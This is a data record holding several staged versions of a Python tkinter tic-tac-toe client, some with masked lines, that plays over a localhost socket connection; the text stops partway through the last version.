"step-1": "<mask token>\n\n\ndef start_thread(target):\n thread = threading.Thread(target=target)\n thread.daemon = True\n thread.start()\n\n\n<mask token>\n\n\ndef receive_data():\n while True:\n data = sock.recv(1024).decode()\n print('decoded is', data)\n if data == 'button':\n labels.config(text=\"My Turn or O's Turn\")\n b1.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b1.config(state='disabled')\n elif data == 'button2':\n labels.config(text=\"My Turn or O's Turn\")\n b2.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b2.config(state='disabled')\n elif data == 'button3':\n labels.config(text=\"My Turn or O's Turn\")\n b3.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b3.config(state='disabled')\n elif data == 'button4':\n labels.config(text=\"My Turn or O's Turn\")\n b4.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b4.config(state='disabled')\n elif data == 'button5':\n labels.config(text=\"My Turn or O's Turn\")\n b5.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b5.config(state='disabled')\n elif data == 'button6':\n labels.config(text=\"My Turn or O's Turn\")\n b6.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b6.config(state='disabled')\n elif data == 'button7':\n labels.config(text=\"My Turn or O's Turn\")\n b7.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b7.config(state='disabled')\n elif data == 'button8':\n labels.config(text=\"My Turn or O's Turn\")\n b8.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b8.config(state='disabled')\n elif data == 'button9':\n labels.config(text=\"My Turn or O's Turn\")\n b9.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b9.config(state='disabled')\n\n\n<mask token>\n\n\ndef resize_image(event):\n new_width = event.width\n new_height = event.height\n image = copy_of_image.resize((new_width, new_height))\n photo = ImageTk.PhotoImage(image)\n label.config(image=photo)\n label.image = photo\n\n\n<mask token>\n\n\ndef checkwin():\n global winner\n winner = False\n if b1['text'] == 'X' and b2['text'] == 'X' and b3['text'] == 'X':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b4['text'] == 'X' and b5['text'] == 'X' and b6['text'] == 'X':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b7['text'] == 'X' and b8['text'] == 'X' and b9['text'] == 'X':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b4['text'] == 'X' and b7['text'] == 'X':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b2['text'] == 'X' and b5['text'] == 'X' and b8['text'] == 'X':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b6['text'] == 'X' and b9['text'] == 'X':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b5['text'] == 'X' and b9['text'] == 'X':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b5['text'] == 'X' and b7['text'] == 'X':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'O' and b2['text'] == 'O' and b3['text'] == 'O':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b4['text'] == 'O' and b5['text'] == 'O' and b6['text'] == 'O':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b7['text'] == 'O' and b8['text'] == 'O' and b9['text'] == 'O':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b4['text'] == 'O' and b7['text'] == 'O':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b2['text'] == 'O' and b5['text'] == 'O' and b8['text'] == 'O':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b6['text'] == 'O' and b9['text'] == 'O':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b5['text'] == 'O' and b9['text'] == 'O':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b5['text'] == 'O' and b7['text'] == 'O':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n\n\ndef b_click(b):\n to_send = str(b)\n to_send = to_send.replace('.', '')\n to_send = str(to_send.replace('!', ''))\n print(to_send)\n global clicked\n if b['text'] == '' and b['state'] != 'disabled':\n labels.config(text=\"X's Turn\")\n b.configure(state=DISABLED)\n b['text'] = 'O'\n checkwin()\n if connection_established == True:\n sock.send(to_send.encode())\n for w in New.winfo_children():\n w.configure(state='disabled')\n\n\n<mask token>\n",
"step-2": "<mask token>\nroot.title('Tic-Tac-Toe')\nroot.geometry('600x600')\n<mask token>\n\n\ndef start_thread(target):\n thread = threading.Thread(target=target)\n thread.daemon = True\n thread.start()\n\n\n<mask token>\nglobal connection_established\n<mask token>\nsock.connect((HOST, PORT))\n<mask token>\n\n\ndef receive_data():\n while True:\n data = sock.recv(1024).decode()\n print('decoded is', data)\n if data == 'button':\n labels.config(text=\"My Turn or O's Turn\")\n b1.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b1.config(state='disabled')\n elif data == 'button2':\n labels.config(text=\"My Turn or O's Turn\")\n b2.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b2.config(state='disabled')\n elif data == 'button3':\n labels.config(text=\"My Turn or O's Turn\")\n b3.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b3.config(state='disabled')\n elif data == 'button4':\n labels.config(text=\"My Turn or O's Turn\")\n b4.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b4.config(state='disabled')\n elif data == 'button5':\n labels.config(text=\"My Turn or O's Turn\")\n b5.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b5.config(state='disabled')\n elif data == 'button6':\n labels.config(text=\"My Turn or O's Turn\")\n b6.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b6.config(state='disabled')\n elif data == 'button7':\n labels.config(text=\"My Turn or O's Turn\")\n b7.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b7.config(state='disabled')\n elif data == 'button8':\n labels.config(text=\"My Turn or O's Turn\")\n b8.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b8.config(state='disabled')\n elif data == 'button9':\n labels.config(text=\"My Turn or O's Turn\")\n b9.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b9.config(state='disabled')\n\n\nstart_thread(receive_data)\n\n\ndef resize_image(event):\n new_width = event.width\n new_height = event.height\n image = copy_of_image.resize((new_width, new_height))\n photo = ImageTk.PhotoImage(image)\n label.config(image=photo)\n label.image = photo\n\n\n<mask token>\nlabel.bind('<Configure>', resize_image)\nlabel.pack(fill=BOTH, expand=YES)\nroot.after(5000, lambda : root.destroy())\nroot.mainloop()\n<mask token>\nNew.title('Tic-Tac-Toe')\nNew.iconbitmap('C:/Users/jainh/Downloads/Tic-tac-toe1.png')\n<mask token>\n\n\ndef checkwin():\n global winner\n winner = False\n if b1['text'] == 'X' and b2['text'] == 'X' and b3['text'] == 'X':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b4['text'] == 'X' and b5['text'] == 'X' and b6['text'] == 'X':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b7['text'] == 'X' and b8['text'] == 'X' and b9['text'] == 'X':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b4['text'] == 'X' and b7['text'] == 'X':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b2['text'] == 'X' and b5['text'] == 'X' and b8['text'] == 'X':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b6['text'] == 'X' and b9['text'] == 'X':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b5['text'] == 'X' and b9['text'] == 'X':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b5['text'] == 'X' and b7['text'] == 'X':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'O' and b2['text'] == 'O' and b3['text'] == 'O':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b4['text'] == 'O' and b5['text'] == 'O' and b6['text'] == 'O':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b7['text'] == 'O' and b8['text'] == 'O' and b9['text'] == 'O':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b4['text'] == 'O' and b7['text'] == 'O':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b2['text'] == 'O' and b5['text'] == 'O' and b8['text'] == 'O':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b6['text'] == 'O' and b9['text'] == 'O':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b5['text'] == 'O' and b9['text'] == 'O':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b5['text'] == 'O' and b7['text'] == 'O':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n\n\ndef b_click(b):\n to_send = str(b)\n to_send = to_send.replace('.', '')\n to_send = str(to_send.replace('!', ''))\n print(to_send)\n global clicked\n if b['text'] == '' and b['state'] != 'disabled':\n labels.config(text=\"X's Turn\")\n b.configure(state=DISABLED)\n b['text'] = 'O'\n checkwin()\n if connection_established == True:\n sock.send(to_send.encode())\n for w in New.winfo_children():\n w.configure(state='disabled')\n\n\n<mask token>\nb1.grid(row=0, column=0)\n<mask token>\nb2.grid(row=0, column=1)\n<mask token>\nb3.grid(row=0, column=2)\n<mask token>\nb4.grid(row=1, column=0)\n<mask token>\nb5.grid(row=1, column=1)\n<mask token>\nb6.grid(row=1, column=2)\n<mask token>\nb7.grid(row=2, column=0)\n<mask token>\nb8.grid(row=2, column=1)\n<mask token>\nb9.grid(row=2, column=2)\n<mask token>\nlabels.grid(row=3, column=0)\nfor w in New.winfo_children():\n w.configure(state='disabled')\nNew.mainloop()\n",
"step-3": "<mask token>\nroot = Tk()\nroot.title('Tic-Tac-Toe')\nroot.geometry('600x600')\nwinner = False\n\n\ndef start_thread(target):\n thread = threading.Thread(target=target)\n thread.daemon = True\n thread.start()\n\n\nHOST = '127.0.0.1'\nPORT = 65432\nglobal connection_established\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((HOST, PORT))\nconnection_established = True\n\n\ndef receive_data():\n while True:\n data = sock.recv(1024).decode()\n print('decoded is', data)\n if data == 'button':\n labels.config(text=\"My Turn or O's Turn\")\n b1.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b1.config(state='disabled')\n elif data == 'button2':\n labels.config(text=\"My Turn or O's Turn\")\n b2.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b2.config(state='disabled')\n elif data == 'button3':\n labels.config(text=\"My Turn or O's Turn\")\n b3.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b3.config(state='disabled')\n elif data == 'button4':\n labels.config(text=\"My Turn or O's Turn\")\n b4.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b4.config(state='disabled')\n elif data == 'button5':\n labels.config(text=\"My Turn or O's Turn\")\n b5.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b5.config(state='disabled')\n elif data == 'button6':\n labels.config(text=\"My Turn or O's Turn\")\n b6.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b6.config(state='disabled')\n elif data == 'button7':\n labels.config(text=\"My Turn or O's Turn\")\n b7.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b7.config(state='disabled')\n elif data == 'button8':\n labels.config(text=\"My Turn or O's Turn\")\n b8.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b8.config(state='disabled')\n elif data == 'button9':\n labels.config(text=\"My Turn or O's Turn\")\n b9.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b9.config(state='disabled')\n\n\nstart_thread(receive_data)\n\n\ndef resize_image(event):\n new_width = event.width\n new_height = event.height\n image = copy_of_image.resize((new_width, new_height))\n photo = ImageTk.PhotoImage(image)\n label.config(image=photo)\n label.image = photo\n\n\nimage = Image.open('C:\\\\Users\\\\User\\\\Any_Path\\\\Tic-tac-toe1.png')\ncopy_of_image = image.copy()\nphoto = ImageTk.PhotoImage(image)\nlabel = ttk.Label(root, image=photo)\nlabel.bind('<Configure>', resize_image)\nlabel.pack(fill=BOTH, expand=YES)\nroot.after(5000, lambda : root.destroy())\nroot.mainloop()\nNew = Tk()\nNew.title('Tic-Tac-Toe')\nNew.iconbitmap('C:/Users/jainh/Downloads/Tic-tac-toe1.png')\nclicked = 'Y'\n\n\ndef checkwin():\n global winner\n winner = False\n if b1['text'] == 'X' and b2['text'] == 'X' and b3['text'] == 'X':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b4['text'] == 'X' and b5['text'] == 'X' and b6['text'] == 'X':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b7['text'] == 'X' and b8['text'] == 'X' and b9['text'] == 'X':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b4['text'] == 'X' and b7['text'] == 'X':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b2['text'] == 'X' and b5['text'] == 'X' and b8['text'] == 'X':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b6['text'] == 'X' and b9['text'] == 'X':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b5['text'] == 'X' and b9['text'] == 'X':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b5['text'] == 'X' and b7['text'] == 'X':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'O' and b2['text'] == 'O' and b3['text'] == 'O':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b4['text'] == 'O' and b5['text'] == 'O' and b6['text'] == 'O':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b7['text'] == 'O' and b8['text'] == 'O' and b9['text'] == 'O':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b4['text'] == 'O' and b7['text'] == 'O':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b2['text'] == 'O' and b5['text'] == 'O' and b8['text'] == 'O':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b6['text'] == 'O' and b9['text'] == 'O':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b5['text'] == 'O' and b9['text'] == 'O':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b5['text'] == 'O' and b7['text'] == 'O':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n\n\ndef b_click(b):\n to_send = str(b)\n to_send = to_send.replace('.', '')\n to_send = str(to_send.replace('!', ''))\n print(to_send)\n global clicked\n if b['text'] == '' and b['state'] != 'disabled':\n labels.config(text=\"X's Turn\")\n b.configure(state=DISABLED)\n b['text'] = 'O'\n checkwin()\n if connection_established == True:\n sock.send(to_send.encode())\n for w in New.winfo_children():\n w.configure(state='disabled')\n\n\nb1 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b1))\nb1.grid(row=0, column=0)\nb2 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b2))\nb2.grid(row=0, column=1)\nb3 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b3))\nb3.grid(row=0, column=2)\nb4 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b4))\nb4.grid(row=1, column=0)\nb5 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b5))\nb5.grid(row=1, column=1)\nb6 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b6))\nb6.grid(row=1, column=2)\nb7 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b7))\nb7.grid(row=2, column=0)\nb8 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b8))\nb8.grid(row=2, column=1)\nb9 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b9))\nb9.grid(row=2, column=2)\nlabels = Label(New, fg='white', bg='black', pady=1, text='Opponent Turn ',\n height=2, justify='center')\nlabels.grid(row=3, column=0)\nfor w in New.winfo_children():\n w.configure(state='disabled')\nNew.mainloop()\n",
"step-4": "from tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\nimport time\nimport socket\nimport threading\nroot = Tk()\nroot.title('Tic-Tac-Toe')\nroot.geometry('600x600')\nwinner = False\n\n\ndef start_thread(target):\n thread = threading.Thread(target=target)\n thread.daemon = True\n thread.start()\n\n\nHOST = '127.0.0.1'\nPORT = 65432\nglobal connection_established\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((HOST, PORT))\nconnection_established = True\n\n\ndef receive_data():\n while True:\n data = sock.recv(1024).decode()\n print('decoded is', data)\n if data == 'button':\n labels.config(text=\"My Turn or O's Turn\")\n b1.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b1.config(state='disabled')\n elif data == 'button2':\n labels.config(text=\"My Turn or O's Turn\")\n b2.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b2.config(state='disabled')\n elif data == 'button3':\n labels.config(text=\"My Turn or O's Turn\")\n b3.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b3.config(state='disabled')\n elif data == 'button4':\n labels.config(text=\"My Turn or O's Turn\")\n b4.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b4.config(state='disabled')\n elif data == 'button5':\n labels.config(text=\"My Turn or O's Turn\")\n b5.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b5.config(state='disabled')\n elif data == 'button6':\n labels.config(text=\"My Turn or O's Turn\")\n b6.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b6.config(state='disabled')\n elif data == 'button7':\n labels.config(text=\"My Turn or O's Turn\")\n b7.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b7.config(state='disabled')\n elif data == 'button8':\n labels.config(text=\"My Turn or O's Turn\")\n b8.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b8.config(state='disabled')\n elif data == 'button9':\n labels.config(text=\"My Turn or O's Turn\")\n b9.config(text='X')\n for w in New.winfo_children():\n w.configure(state='normal')\n b9.config(state='disabled')\n\n\nstart_thread(receive_data)\n\n\ndef resize_image(event):\n new_width = event.width\n new_height = event.height\n image = copy_of_image.resize((new_width, new_height))\n photo = ImageTk.PhotoImage(image)\n label.config(image=photo)\n label.image = photo\n\n\nimage = Image.open('C:\\\\Users\\\\User\\\\Any_Path\\\\Tic-tac-toe1.png')\ncopy_of_image = image.copy()\nphoto = ImageTk.PhotoImage(image)\nlabel = ttk.Label(root, image=photo)\nlabel.bind('<Configure>', resize_image)\nlabel.pack(fill=BOTH, expand=YES)\nroot.after(5000, lambda : root.destroy())\nroot.mainloop()\nNew = Tk()\nNew.title('Tic-Tac-Toe')\nNew.iconbitmap('C:/Users/jainh/Downloads/Tic-tac-toe1.png')\nclicked = 'Y'\n\n\ndef checkwin():\n global winner\n winner = False\n if b1['text'] == 'X' and b2['text'] == 'X' and b3['text'] == 'X':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b4['text'] == 'X' and b5['text'] == 'X' and b6['text'] == 'X':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b7['text'] == 'X' and b8['text'] == 'X' and b9['text'] == 'X':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b4['text'] == 'X' and b7['text'] == 'X':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b2['text'] == 'X' and b5['text'] == 'X' and b8['text'] == 'X':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b6['text'] == 'X' and b9['text'] == 'X':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'X' and b5['text'] == 'X' and b9['text'] == 'X':\n b1.config(bg='green')\n b5.config(bg='green')\n 